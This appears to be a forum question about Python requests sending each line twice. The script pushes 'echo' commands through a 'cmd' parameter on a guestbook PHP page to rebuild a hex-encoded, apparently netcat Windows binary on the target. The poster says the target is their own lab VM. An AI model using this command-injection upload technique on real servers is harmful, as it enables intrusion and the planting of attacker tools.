# Python requests sending twice

Tags: python-3.x, python-requests

I've written a short Python script to push a file via echoing it in to a URL.

```
import requests
import re

line=''
url1='http://XX.XX.XX.XX/addguestbook.php?name=a&cmd='
url2='/bla/bla'

with open("nc.txt", "r") as echofile:
    data = echofile.readlines()

for line in data:
    r=requests.get(url1+line+url2)
    #print(line)
```

The nc.txt file uses the fomat of:

```
echo n 1.dll >123.hex
echo e 0100 >>123.hex
echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00  >>123.hex 
echo e 0180 >>123.hex
echo 50 45 00 00 4c 01 03 00 b9 8e ae 34 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 00 00 70 00 00 00 10 00 00 00 d0 00 00 70 4c 01 00 00 e0 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  >>123.hex 
echo e 0200 >>123.hex
echo 00 50 01 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00  >>123.hex 
echo e 0280 >>123.hex
echo 00 d0 00 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 70 00 00 00 e0 00 00 00 70 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 50 01 00 00 02 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 34 00 55 50 58 21 0d 09 02 09 6e 0c ee  >>123.hex 
echo e 0300 >>123.hex
```

Problem is, each line seems to be sent twice.  I've found discussion of this online (suggesting it's caused by redirects), but not actual usable resolutions.

I'm pretty new to programming, so help would be appreciated!

Comment: You can check whether it's due to a redirection, cf http://docs.python-requests.org/en/master/user/quickstart/#redirection-and-history.

Comment: Looks like you're trying to hack the site ?

Comment: It's a VM I'm controlling, hence I can see from the other side that it's receiving all of the data twice